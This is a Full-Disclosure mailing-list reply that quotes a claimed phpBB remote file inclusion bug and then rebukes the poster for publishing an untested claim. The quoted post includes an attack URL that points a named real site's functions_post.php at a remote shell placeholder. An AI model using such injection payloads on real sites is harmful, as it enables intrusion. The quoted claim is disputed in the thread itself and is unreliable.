Re: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT

[<hardened-php@xxxxxxxxxxxx>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

"New bug found in phpBB, most pages vulnerable, theres more bugs,
I\'ll post one a week:

victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.sh
ell]%00

For example:

http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[rem
ote.shell]%00

Enjoy :)

BUG BY REZEN! XORCREW! H4X H4X!"

Did you even read the code rezen? test your "vuln"? How about you
test what you find instead of posting everything you see to the
list and trying to get attention/fame? Leave vuln assessment/code
auditing to people who actually care about it, and stop playing as
one.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkZhJdIACgkQMe2+mPigEXJ5awP+Iqd9pRIypATEnM1K7ZhpAjxPgJeY
NedFd4Dkf6EgeQFy0zY2qGHM24CrbHO27bfsM2tRbUIdxUbGjD+f5pQ1hGjEF0Mg6Jw0
cBoER8jhWMiZZRxlseaKtkL7t8iF4DsZq5OIdrbHEm4oGpudHE0FKpJFyLsR8Tk85ziA
Icd6qcQ=
=Rhg/
-----END PGP SIGNATURE-----

--
Prices, software, charts & analysis.  Click here to open your online FX trading 
account.
http://tagline.hushmail.com/fc/CAaCXv1QmGxJYt2brAIxTpm5SofhvHbE/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/